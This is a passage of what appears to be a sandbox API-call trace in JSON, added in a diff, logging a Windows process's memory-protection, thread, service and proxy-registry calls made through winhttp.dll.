"category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x73a88000" + }, + { + "name": "ModuleName", + "value": "winhttp.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1108 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756b90b8", + "parentcaller": "0x75096ff4", + "category": "threading", + "api": "NtOpenThread", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ThreadHandle", + "value": "0x0000046c" + }, + { + "name": "DesiredAccess", + "value": "0x00100010", + "pretty_value": "THREAD_SET_CONTEXT|0x00100000" + }, + { + "name": "ProcessId", + "value": "9436" + }, + { + "name": "ThreadId", + "value": "8196" + } + ], + "repeated": 0, + "id": 1109 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b8b4a", + "parentcaller": "0x74631d6b", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000434" + } + ], + "repeated": 0, + "id": 1110 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x76041aad", + "parentcaller": "0x74631a69", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000430" + }, + { + "name": "IoControlCode", + "value": "0x0012000f" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x11ct\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00L\\xfbW\\x05\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x11ct\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00L\\xfbW\\x05\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00h\\x00\\x00\\x008\\x00\\x00\\x00\\xd4\\xfbW\\x05i\\x1act\\x01\\x00\\x00\\x00\\xf0\\x11ct\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00L\\xfbW\\x05\\x08\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1111 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b8b4a", + "parentcaller": "0x76041ad2", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000434" + } + ], + "repeated": 0, + "id": 1112 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b8c89", + "parentcaller": "0x756b8be2", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000434" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 0, + "id": 1113 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x7703feff", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x73a88000" + }, + { + "name": "ModuleName", + "value": "winhttp.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1114 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x7703ff34", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x73a88000" + }, + { + "name": "ModuleName", + "value": "winhttp.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1115 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756b8b4a", + "parentcaller": "0x75097fbf", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000046c" + } + ], + "repeated": 0, + "id": 1116 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756b8b4a", + "parentcaller": "0x73a0ecf3", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000468" + } + ], + "repeated": 0, + "id": 1117 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b8b4a", + "parentcaller": "0x74631d6b", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000434" + } + ], + "repeated": 0, + "id": 1118 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x76041aad", + "parentcaller": "0x74631a69", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000430" + }, + { + "name": "IoControlCode", + "value": "0x0012000f" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x11ct\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00L\\xfbW\\x05\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x11ct\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00L\\xfbW\\x05\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00h\\x00\\x00\\x008\\x00\\x00\\x00\\xd4\\xfbW\\x05i\\x1act\\x01\\x00\\x00\\x00\\xf0\\x11ct\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00L\\xfbW\\x05\\x08\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1119 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b8b4a", + "parentcaller": "0x76041ad2", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000434" + } + ], + "repeated": 0, + "id": 1120 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b8c89", + "parentcaller": "0x756b8be2", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000434" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 0, + "id": 1121 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x77057a99", + "parentcaller": "0x75122407", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1122 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x7512104c", + "parentcaller": "0x7511e3b8", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 1, + "id": 1123 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x77057a99", + "parentcaller": "0x75122407", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1124 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b8b4a", + "parentcaller": "0x74631d6b", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000434" + } + ], + "repeated": 0, + "id": 1125 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x76041941", + "parentcaller": "0x738c788a", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": false, + "return": "0xffffffffc0000225", + "pretty_return": "NOT_FOUND", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000430" + }, + { + "name": "IoControlCode", + "value": "0x00120007" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00H\\x1b\\x8cs\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xb0\\xf6W\\x058\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\xf7W\\x05\\x04\\x00\\x00\\x00|\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "" + } + ], + "repeated": 0, + "id": 1126 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b8b4a", + "parentcaller": "0x76041966", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004b4" + } + ], + "repeated": 0, + "id": 1127 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x76041941", + "parentcaller": "0x738c788a", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000430" + }, + { + "name": "IoControlCode", + "value": "0x00120007" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00`\\x1b\\x8cs\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xb0\\xf6W\\x05 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\xf7W\\x05\\x04\\x00\\x00\\x00X\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00`\\x1b\\x8cs\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xb0\\xf6W\\x05 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\xf7W\\x05\\x04\\x00\\x00\\x00X\\x00\\x00\\x00\\x00\\x00\\x00\\x00P\\x00\\x00\\x00\\xf0\\xf6W\\x05\\x8ax\\x8cs\\x01\\x00\\x00\\x00`\\x1b\\x8cs\\x00\\x00\\x00\\x00\\xb0\\xf6W\\x05" + } + ], + "repeated": 0, + "id": 1128 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b8b4a", + "parentcaller": "0x76041966", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004b4" + } + ], + "repeated": 0, + "id": 1129 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x76041941", + "parentcaller": "0x738c6889", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000430" + }, + { + "name": "IoControlCode", + "value": "0x00120007" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\x8cs\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00X\\xeaW\\x05\\x04\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\xc8\\xf7W\\x05\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\x8cs\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00X\\xeaW\\x05\\x04\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\xc8\\xf7W\\x05\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00P\\x00\\x00\\x00P\\xeaW\\x05\\x89h\\x8cs\\x01\\x00\\x00\\x000\\x1b\\x8cs\\x02\\x00\\x00\\x00X\\xeaW\\x05" + } + ], + "repeated": 0, + "id": 1130 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b8b4a", + "parentcaller": "0x76041966", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004b4" + } + ], + "repeated": 0, + "id": 1131 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x76041941", + "parentcaller": "0x738c631a", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000430" + }, + { + "name": "IoControlCode", + "value": "0x00120007" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\x8cs\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x84\\xeaW\\x05\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\x8cs\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x84\\xeaW\\x05\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00P\\x00\\x00\\x00\\xf0\\xf6W\\x05\\x1ac\\x8cs\\x01\\x00\\x00\\x000\\x1b\\x8cs\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1132 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b8b4a", + "parentcaller": "0x76041966", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004b4" + } + ], + "repeated": 0, + "id": 1133 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x76041aad", + "parentcaller": "0x738c6386", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000430" + }, + { + "name": "IoControlCode", + "value": "0x0012000f" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\x8cs\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00x\\xeaW\\x05\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\xf0W\\x05\\x90\\x02\\x00\\x00\\x80\\xebW\\x058\\x02\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\x8cs\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00x\\xeaW\\x05\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\xf0W\\x05\\x90\\x02\\x00\\x00\\x80\\xebW\\x058\\x02\\x00\\x00\\x00\\x00\\x00\\x00h\\x00\\x00\\x008\\x00\\x00\\x00\\xf0\\xf6W\\x05\\x86c\\x8cs\\x01\\x00\\x00\\x000\\x1b\\x8cs\\x01\\x00\\x00\\x00x\\xeaW\\x05\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1134 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b8b4a", + "parentcaller": "0x76041ad2", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004b4" + } + ], + "repeated": 0, + "id": 1135 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x76041941", + "parentcaller": "0x738c631a", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000430" + }, + { + "name": "IoControlCode", + "value": "0x00120007" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\x8cs\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x8c\\xeaW\\x05\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\x8cs\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x8c\\xeaW\\x05\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00P\\x00\\x00\\x00\\xf8\\xf6W\\x05\\x1ac\\x8cs\\x01\\x00\\x00\\x000\\x1b\\x8cs\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1136 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b8b4a", + "parentcaller": "0x76041966", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004b4" + } + ], + "repeated": 0, + "id": 1137 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x76041aad", + "parentcaller": "0x738c6386", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000430" + }, + { + "name": "IoControlCode", + "value": "0x0012000f" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\x8cs\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80\\xeaW\\x05\\x08\\x00\\x00\\x00\\xa8\\xf2W\\x05D\\x04\\x00\\x00\\xb0\\xeaW\\x05\\xd8\\x00\\x00\\x00\\xc0\\xedW\\x05X\\x02\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\x8cs\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80\\xeaW\\x05\\x08\\x00\\x00\\x00\\xa8\\xf2W\\x05D\\x04\\x00\\x00\\xb0\\xeaW\\x05\\xd8\\x00\\x00\\x00\\xc0\\xedW\\x05X\\x02\\x00\\x00\\x00\\x00\\x00\\x00h\\x00\\x00\\x008\\x00\\x00\\x00\\xf8\\xf6W\\x05\\x86c\\x8cs\\x01\\x00\\x00\\x000\\x1b\\x8cs\\x00\\x00\\x00\\x00\\x80\\xeaW\\x05\\x08\\x00\\x00\\x00\\xa8\\xf2W\\x05D\\x04\\x00\\x00" + } + ], + "repeated": 0, + "id": 1138 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b8b4a", + "parentcaller": "0x76041ad2", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004b4" + } + ], + "repeated": 0, + "id": 1139 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x73a0ed9e", + "parentcaller": "0x73a0eb97", + "category": "services", + "api": "OpenSCManagerW", + "status": true, + "return": "0x00744338", + "arguments": [ + { + "name": "MachineName", + "value": "" + }, + { + "name": "DatabaseName", + "value": "" + }, + { + "name": "DesiredAccess", + "value": "0x00000001", + "pretty_value": "SC_MANAGER_CONNECT" + } + ], + "repeated": 0, + "id": 1140 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x73a0edb9", + "parentcaller": "0x73a0eb97", + "category": "services", + "api": "OpenServiceW", + "status": true, + "return": "0x00743dc0", + "arguments": [ + { + "name": "ServiceControlManager", + "value": "0x00744338" + }, + { + "name": "ServiceName", + "value": "WinHttpAutoProxySvc" + }, + { + "name": "DesiredAccess", + "value": "0x00000094", + "pretty_value": "SERVICE_QUERY_STATUS|SERVICE_START|SERVICE_INTERROGATE" + } + ], + "repeated": 0, + "id": 1141 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756b90b8", + "parentcaller": "0x75096ff4", + "category": "threading", + "api": "NtOpenThread", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ThreadHandle", + "value": "0x000004b4" + }, + { + "name": "DesiredAccess", + "value": "0x00100010", + "pretty_value": "THREAD_SET_CONTEXT|0x00100000" + }, + { + "name": "ProcessId", + "value": "9436" + }, + { + "name": "ThreadId", + "value": "8196" + } + ], + "repeated": 0, + "id": 1142 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x750968c8", + "parentcaller": "0x7704f12a", + "category": "threading", + "api": "NtQueueApcThread", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessId", + "value": "9436" + }, + { + "name": "ThreadId", + "value": "8196" + }, + { + "name": "ThreadHandle", + "value": "0x000004b4" + }, + { + "name": "ApcRoutine", + "value": "0x750a2550" + }, + { + "name": "Module", + "value": "sechost.dll" + } + ], + "repeated": 0, + "id": 1143 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756b8c89", + "parentcaller": "0x75097f8c", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1144 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756b8c89", + "parentcaller": "0x75097f8c", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004b4" + }, + { + "name": "Milliseconds", + "value": "0" + } + ], + "repeated": 0, + "id": 1145 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756d6dcb", + "parentcaller": "0x75097fa8", + "category": "system", + "api": "NtDelayExecution", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Milliseconds", + "value": "250" + } + ], + "repeated": 0, + "id": 1146 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756b8b4a", + "parentcaller": "0x750a2570", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004b4" + } + ], + "repeated": 0, + "id": 1147 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756b8b4a", + "parentcaller": "0x73a0ecf3", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000046c" + } + ], + "repeated": 0, + "id": 1148 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8036", + "caller": "0x770564c6", + "parentcaller": "0x770563d1", + "category": "threading", + "api": "NtTestAlert", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1149 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1150 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000046c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000027c" + }, + { + "name": "ObjectAttributesName", + "value": "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" + } + ], + "repeated": 0, + "id": 1151 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000046c" + }, + { + "name": "ValueName", + "value": "ProxyEnable" + }, + { + "name": "Type", + "value": "4", + "pretty_value": "REG_DWORD" + }, + { + "name": "Information", + "value": "0" + }, + { + "name": "FullName", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyEnable" + } + ], + "repeated": 0, + "id": 1152 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000046c" + }, + { + "name": "ValueName", + "value": "ProxyServer" + }, + { + "name": "FullName", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServer" + } + ], + "repeated": 0, + "id": 1153 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000046c" + }, + { + "name": "ValueName", + "value": "ProxyOverride" + }, + { + "name": "FullName", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyOverride" + } + ], + "repeated": 0, + "id": 1154 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000046c" + }, + { + "name": "ValueName", + "value": "AutoConfigURL" + }, + { + "name": "FullName", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL" + } + ], + 